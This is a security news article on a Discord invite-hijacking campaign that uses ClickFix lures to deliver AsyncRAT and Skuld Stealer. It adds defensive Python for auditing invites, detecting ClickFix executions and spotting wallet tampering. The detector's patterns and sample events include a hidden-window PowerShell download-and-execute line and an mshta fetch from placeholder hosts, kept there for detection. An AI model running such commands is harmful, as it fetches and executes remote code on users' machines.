Discord Invite Link Exploitation Facilitates AsyncRAT and Skuld Stealer Deployment Against Cryptocurrency Wallets


A recently documented malware campaign abuses a weakness in Discord's invite system to distribute the Skuld information stealer and the AsyncRAT remote access trojan. The attackers hijack expired or deleted invite codes by re-registering them as vanity links, so that links once shared by legitimate communities now quietly send users to servers the attackers control.

According to a technical report from Check Point, the attackers combine the ClickFix phishing technique with multi-stage loaders and time-based evasion to deliver AsyncRAT and a customized build of Skuld Stealer that focuses on cryptocurrency wallets. The weakness in Discord's invite mechanism lets anyone claim an expired or deleted invite code, so a link that was safe when it was first posted can later lead to a malicious server.

This campaign was disclosed shortly after Check Point identified another phishing operation using similar tactics, in which expired vanity links lured users into joining a Discord server and then sent them to a phishing site that compromised their digital assets.

Discord lets users create temporary invite links (which expire), permanent invite links, and custom vanity links, the last being a perk reserved for highly boosted servers. Once an invite code has expired or been deleted, Discord offers the original server no way to reclaim it. Check Point found that an expired temporary code, and in some cases even a deleted permanent code, can be registered as a vanity link by a different server, so the old URL resolves to that server from then on.
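
An added example (not from the Check Point report or from Discord) of how a community moderator might audit the invite links they have published against the server those links are supposed to reach. It uses Discord's public, unauthenticated `GET /api/v10/invites/{code}` endpoint, which returns the guild a code currently resolves to, or a JSON error body with `"code": 10006` ("Unknown Invite") when the code no longer exists. The expected guild ID, the invite codes and the canned API responses below are constructed for an offline run.

```python
"""Audit published Discord invite links: do they still resolve to our guild?

A code that returns "Unknown Invite" is exactly the state an attacker can
take over by registering it as a vanity link; a code that resolves to a
different guild has already been hijacked (or legitimately moved).
"""
import json
import re
import urllib.error
import urllib.request

INVITE_API = "https://discord.com/api/v10/invites/{code}"
UNKNOWN_INVITE = 10006  # Discord JSON error code for a non-existent invite

# Matches discord.gg/<code>, discord.com/invite/<code>, discordapp.com/invite/<code>.
# Vanity codes may contain hyphens, so they are allowed in the character class.
INVITE_RE = re.compile(
    r"(?:https?://)?(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)",
    re.IGNORECASE,
)


def extract_invite_code(text):
    """Return the invite code found in a URL or free text, or None."""
    m = INVITE_RE.search(text)
    return m.group(1) if m else None


def fetch_invite(code, timeout=10):
    """Query Discord for the guild an invite code currently resolves to.

    On 404 Discord still returns a JSON body ({"message": "Unknown Invite",
    "code": 10006}); it is returned as-is so the caller can classify it.
    """
    req = urllib.request.Request(
        INVITE_API.format(code=code),
        headers={"User-Agent": "invite-audit/1.0"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        return json.loads(err.read().decode("utf-8", "replace"))


def classify_invite(response, expected_guild_id):
    """Classify one invite API response relative to the guild we expect."""
    if response.get("code") == UNKNOWN_INVITE or "guild" not in response:
        # Expired or deleted: free to be re-registered as someone else's vanity link.
        return "dead"
    if response["guild"]["id"] == expected_guild_id:
        return "ok"
    # Resolves, but to another server: hijacked (or moved without telling us).
    return "redirected"


def audit_links(links, expected_guild_id, fetch=fetch_invite):
    """Map each published link to ok / dead / redirected / not_an_invite.

    `fetch` is injectable so the audit can run against canned responses.
    """
    report = {}
    for link in links:
        code = extract_invite_code(link)
        if code is None:
            report[link] = "not_an_invite"
            continue
        report[link] = classify_invite(fetch(code), expected_guild_id)
    return report


# Constructed sample data for an offline run (not real servers or codes).
EXPECTED_GUILD = "111111111111111111"
CANNED_RESPONSES = {
    "ourserver": {"code": "ourserver", "guild": {"id": EXPECTED_GUILD, "name": "Our Community"}},
    "oldpromo": {"message": "Unknown Invite", "code": UNKNOWN_INVITE},
    "teamchat": {"code": "teamchat", "guild": {"id": "222222222222222222", "name": "Verify Here"}},
}


def canned_fetch(code):
    return CANNED_RESPONSES.get(code, {"message": "Unknown Invite", "code": UNKNOWN_INVITE})


def demo():
    links = [
        "https://discord.gg/ourserver",
        "discord.com/invite/oldpromo",
        "https://discord.gg/teamchat",
        "https://example.invalid/not-discord",
    ]
    return audit_links(links, EXPECTED_GUILD, fetch=canned_fetch)


if __name__ == "__main__":
    for link, status in demo().items():
        print(f"{status:13} {link}")
```

Run periodically against every place the community has posted its invite: a "dead" result means the code should be replaced in the post before someone else claims it, and a "redirected" result means it already has been.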

This matters because users who follow an old but once-trusted invite link found on a forum, in a tutorial, or on social media can end up on a fraudulent server without noticing. The hijacker takes over a link originally shared by a genuine community and points it at an attacker-controlled server, where a bot prompts newcomers to "verify" themselves before they can participate; that prompt leads to a lookalike website featuring a "Verify" button.

The attackers then apply the ClickFix social-engineering tactic, getting victims to infect themselves under the guise of completing verification. Clicking "Verify" runs a JavaScript handler that silently copies a PowerShell command to the clipboard, and the page instructs the user to open the Windows Run dialog (Win+R), paste, and press Enter. Doing so downloads a script hosted on Pastebin, which in turn retrieves and runs the first-stage downloader that ultimately deploys AsyncRAT and Skuld Stealer.
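
As an added example (not part of the Check Point report), the following Python routine scores process-creation records for the execution pattern this lure produces: a script host launched directly by explorer.exe, which is what the Run dialog does, with a command line that fetches and executes remote content. The field names mirror a Sysmon event ID 1 record; the sample events, including their URLs, are constructed and do not point at real payloads.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

The lure ends with the victim pasting a command into the Run dialog (Win+R).
On Windows that spawns the interpreter directly under explorer.exe, so the
combination "explorer.exe -> powershell.exe (or another script host) with a
download-and-execute command line" is the signal to look for; a user who
opens a terminal first produces a different parent process.
"""
import re
from dataclasses import dataclass

# Script hosts an attacker can launch from the Run dialog.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download cradles (PowerShell aliases, .NET methods, LOLBins) and the execute half.
CRADLE_RE = re.compile(
    r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|curl|wget|certutil)\b",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Switches used to keep the console invisible or to sidestep policy and logging.
STEALTH_RE = re.compile(
    r"-(?:w|win|window|windowstyle)\s+hidden\b|-e(?:nc|ncodedcommand)?\s|-nop\b|-noprofile\b|"
    r"-(?:ep|executionpolicy)\s+bypass\b",
    re.IGNORECASE,
)
# Paste and code-hosting services used as staging and dead-drop hosts in this campaign.
HOSTING_RE = re.compile(r"pastebin\.com|raw\.githubusercontent\.com|github\.com|bitbucket\.org", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Subset of a Sysmon event ID 1 / EDR process-creation record."""
    parent_image: str
    image: str
    command_line: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev):
    """Return the list of indicators present in one event (empty if none)."""
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return []
    hits = []
    if _basename(ev.parent_image) == "explorer.exe":
        hits.append("script host spawned by explorer.exe (Run dialog)")
    if CRADLE_RE.search(ev.command_line) or URL_RE.search(ev.command_line):
        hits.append("remote content fetched in command line")
    if EXEC_RE.search(ev.command_line):
        hits.append("fetched content piped to Invoke-Expression")
    if STEALTH_RE.search(ev.command_line):
        hits.append("hidden window / encoded / policy-bypass switch")
    if HOSTING_RE.search(ev.command_line):
        hits.append("payload staged on paste or code-hosting service")
    return hits


def is_clickfix(ev):
    """High-confidence verdict: Run-dialog parent plus a remote fetch."""
    hits = clickfix_indicators(ev)
    return any("explorer.exe" in h for h in hits) and any("remote content" in h for h in hits)


# Constructed sample telemetry; the URLs are placeholders, not real payloads.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr https://pastebin.com/raw/EXAMPLE | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Program Files\WindowsApps\WindowsTerminal.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 'pwsh -c "irm https://get.example.invalid/install.ps1 | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://cdn.example.invalid/verify.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]


def triage(events):
    """Return (event index, verdict, indicators) for every event with an indicator."""
    out = []
    for i, ev in enumerate(events):
        hits = clickfix_indicators(ev)
        if hits:
            out.append((i, is_clickfix(ev), hits))
    return out


if __name__ == "__main__":
    for i, verdict, hits in triage(SAMPLE_EVENTS):
        print(f"event {i}: {'CLICKFIX' if verdict else 'review  '} {hits}")
```

The second sample (an admin running a local script from the Run dialog) and the third (a developer piping an installer into `iex` from a terminal) each trip one indicator but not the verdict, which is the point of keeping the parent-process condition and the remote-fetch condition separate: either alone is common, the pair together is the ClickFix shape.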

The infection chain is a carefully layered, multi-stage design built for stealth, including checks intended to evade sandbox analysis. AsyncRAT gives the operators extensive remote control over compromised machines and does not hard-code its command-and-control address; instead it fetches it at runtime from a Pastebin paste, a technique known as a dead drop resolver. The second payload, Skuld, is written in Go and harvests sensitive data from Discord, web browsers, and cryptocurrency wallets.

Skuld extracts seed phrases and passwords from cryptocurrency wallets, in particular Exodus and Atomic, through wallet injection: it replaces legitimate application files with trojanized copies that capture the user's secrets. It also bundles a modified build of the open-source tool ChromeKatz, which reads credentials and cookies out of the running browser's memory to sidestep Chrome's app-bound encryption, and ships everything it collects to the attackers through a Discord webhook.
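
Wallet injection leaves a simple artifact to check for: the wallet's code no longer matches what the vendor shipped. The following added example (not from the report or from either wallet vendor) takes a hash baseline of an install directory and reports files that later differ, which is how a defender or a careful user can confirm an Exodus or Atomic installation has not been tampered with. That both wallets are Electron applications whose code lives in a `resources/app.asar` bundle, and the Windows install paths used, are assumptions of the example rather than details from the report; the fake install tree in `demo()` is constructed.

```python
"""Detect wallet injection by hashing a wallet's install tree against a baseline.

Wallet injection swaps the application's code for a trojanized copy while the
signed launcher stays untouched, so a content-hash baseline taken from a clean
install is enough to surface it. Exodus and Atomic are Electron apps, and the
bundle a stealer would replace is resources/app.asar; that, and the install
paths below, are assumptions of this example.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Assumed default Windows install locations (override for other setups).
WALLET_INSTALLS = {
    "exodus": Path(os.environ.get("LOCALAPPDATA", ".")) / "exodus",
    "atomic": Path(os.environ.get("LOCALAPPDATA", ".")) / "Programs" / "atomic",
}


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large bundles are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def snapshot(root):
    """Map relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_snapshots(baseline, current):
    """Compare two snapshots; each list is sorted for stable output."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "modified": sorted(k for k in base_keys & cur_keys if baseline[k] != current[k]),
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
    }


def injection_suspected(diff):
    """A changed code bundle is the signature of wallet injection. A genuine
    update also changes it, so confirm against the vendor's release before
    dismissing a hit; a changed bundle with no corresponding update is the alarm."""
    return any(k.endswith("app.asar") for k in diff["modified"])


def demo():
    """Offline run on a constructed fake install tree (no real wallet is touched)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "exodus" / "app-0.0.0"
        (root / "resources").mkdir(parents=True)
        (root / "Exodus.exe").write_bytes(b"MZ fake launcher, not a real binary")
        (root / "resources" / "app.asar").write_bytes(b"original Electron bundle")
        baseline = snapshot(root)
        # Simulate the stealer: bundle replaced, launcher left alone.
        (root / "resources" / "app.asar").write_bytes(b"trojanized Electron bundle")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    result = demo()
    print(result, "-> injection suspected:", injection_suspected(result))
    for name, path in WALLET_INSTALLS.items():
        if path.exists():
            print(f"{name}: {len(snapshot(path))} files hashed; store this snapshot as your baseline")
```

In practice the baseline is taken right after a clean install or a verified update, stored somewhere the wallet's user account cannot write to, and the comparison is run before each use or on a schedule; the "added" and "removed" lists also catch droppers that leave extra files next to the bundle.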

Relying on trusted services such as GitHub, Bitbucket, Pastebin, and Discord for payload delivery and data exfiltration lets the attackers blend into legitimate traffic and evade detection. Discord has since disabled the malicious bot used in this campaign, blunting it, but Check Point has also observed a separate campaign by the same threat actor distributing a malicious loader disguised as a hacking tool for pirated games.

Victims have been identified in several countries, including the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. The campaign is one more instance of the ongoing abuse of Discord and its CDN infrastructure for malicious purposes.

The campaign shows how a seemingly benign detail of Discord's invite system can become a vector for sophisticated attacks. By taking over legitimate invite links, the criminals redirect users to malicious Discord servers, and the choice of payloads points to a deliberate, financially motivated focus on cryptocurrency users.